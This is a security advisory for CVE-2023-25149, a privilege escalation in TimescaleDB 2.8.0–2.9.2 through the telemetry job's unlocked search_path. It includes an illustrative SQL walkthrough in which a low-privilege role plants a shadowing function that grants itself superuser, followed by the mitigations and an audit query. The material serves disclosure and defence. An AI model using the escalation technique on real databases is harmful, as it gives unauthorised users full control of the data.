PT-2023-19938 · Timescale · Timescaledb

Thanasi

·

Published

2023-02-14

·

Updated

2025-03-04

·

CVE-2023-25149

CVSS v3.1

8.8

High

Vector: AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Name of the Vulnerable Software and Affected Versions: TimescaleDB versions 2.8.0 through 2.9.2
Description: TimescaleDB has a privilege escalation issue because the telemetry job runs with an unlocked search_path. A malicious user who can create objects in a schema on that search path can define functions that the telemetry job will pick up and execute with the job's privileges. To exploit this, a user needs to be able to create objects in a database and then get a superuser to install TimescaleDB into that database. When TimescaleDB is installed as a trusted extension, non-superusers can install it without help from a superuser. The issue is not exploitable on instances in Timescale Cloud and Managed Service for TimescaleDB due to additional security provisions.
Recommendations: For versions 2.8.0 through 2.9.2, update to version 2.9.3, which fixes the issue. As a mitigation, lock down the search_path of the user running the telemetry job so that it does not include any schema writable by other users.
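The description and the recommendation above both turn on one PostgreSQL mechanism: an unqualified function call inside superuser-owned job code is resolved at run time against the caller's search_path, so whoever can create objects in a schema that appears earlier on that path can substitute their own function. The SQL below is an added illustration of that bug class, not TimescaleDB's telemetry code; the jobs schema, the maintenance_job() and helper_metrics() functions and the lowpriv role are assumed names, and the telemetry job's real internals are not described on this page. Run it as a superuser against a scratch database.

```sql
-- Added example: generic model of the unlocked-search_path bug class.
-- NOT TimescaleDB's telemetry code; "jobs", maintenance_job(),
-- helper_metrics() and "lowpriv" are assumed names for the illustration.

-- 1. Superuser-owned job code. helper_metrics() is called unqualified, so
--    PL/pgSQL resolves it at run time against the caller's search_path.
CREATE SCHEMA jobs;

CREATE FUNCTION jobs.helper_metrics() RETURNS text
  LANGUAGE sql AS $$ SELECT 'real metrics' $$;

CREATE FUNCTION jobs.maintenance_job() RETURNS text
  LANGUAGE plpgsql AS $$
BEGIN
  RETURN helper_metrics();   -- unqualified call: the weak point
END $$;

-- 2. A low-privilege role that may create objects in a schema that sits
--    earlier in the job runner's search_path than "jobs" does.
--    (Before PostgreSQL 15 every role had CREATE on public by default.)
CREATE ROLE lowpriv LOGIN;
GRANT USAGE, CREATE ON SCHEMA public TO lowpriv;

-- 3. As lowpriv: plant a same-named function in public. Its body runs with
--    the privileges of whoever executes the job, i.e. the superuser.
SET ROLE lowpriv;
CREATE FUNCTION public.helper_metrics() RETURNS text
  LANGUAGE plpgsql AS $$
BEGIN
  ALTER ROLE lowpriv SUPERUSER;
  RETURN 'shadowed';
END $$;
RESET ROLE;

-- 4. Vulnerable run: the superuser's session has an unlocked search_path
--    in which public precedes jobs, so public.helper_metrics() is chosen.
SET search_path = "$user", public, jobs;
SELECT jobs.maintenance_job();                           -- 'shadowed'
SELECT rolsuper FROM pg_roles WHERE rolname = 'lowpriv'; -- true

-- 5. Mitigation, as recommended above: pin the search_path so that no
--    schema writable by other users is consulted. Do it on the function
--    (travels with the code) and/or on the role that runs the job.
ALTER FUNCTION jobs.maintenance_job()
  SET search_path = pg_catalog, jobs, pg_temp;
-- ALTER ROLE <job_runner_role> SET search_path = pg_catalog, jobs, pg_temp;

ALTER ROLE lowpriv NOSUPERUSER;                          -- undo the escalation
SELECT jobs.maintenance_job();                           -- 'real metrics'
SELECT rolsuper FROM pg_roles WHERE rolname = 'lowpriv'; -- false

-- 6. Defense in depth: stop untrusted roles creating objects in shared
--    schemas at all, and audit for functions that shadow a name used in
--    another schema (hypothetical audit query, adjust the schema filter).
REVOKE CREATE ON SCHEMA public FROM PUBLIC;
REVOKE CREATE ON SCHEMA public FROM lowpriv;

SELECT n.nspname, p.proname, pg_get_function_identity_arguments(p.oid) AS args
FROM   pg_proc p
JOIN   pg_namespace n ON n.oid = p.pronamespace
WHERE  p.proname IN (SELECT proname FROM pg_proc
                     GROUP BY proname HAVING count(DISTINCT pronamespace) > 1)
AND    n.nspname NOT IN ('pg_catalog', 'information_schema')
ORDER  BY p.proname, n.nspname;
```

Two points a practitioner should carry over to the real advisory. First, pinning search_path on the function or role is the "lock down" the recommendation describes; listing pg_catalog first and pg_temp last closes the same hole for built-in names and for temporary objects, which otherwise take precedence. Second, the REVOKE in step 6 removes the precondition the description names (the ability to create objects in the database), which is why the issue is reported as not exploitable on the managed offerings with tighter provisioning; it is a mitigation, not a substitute for upgrading to 2.9.3.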

Weakness Enumeration

Improper Privilege Management (CWE-269)
Improper Access Control (CWE-284)

Related Identifiers

ALT-PU-2025-3660
BIT-TIMESCALEDB-2023-25149
CVE-2023-25149
GHSA-44JH-J22R-33WQ

Affected Products

Alt Linux
Timescaledb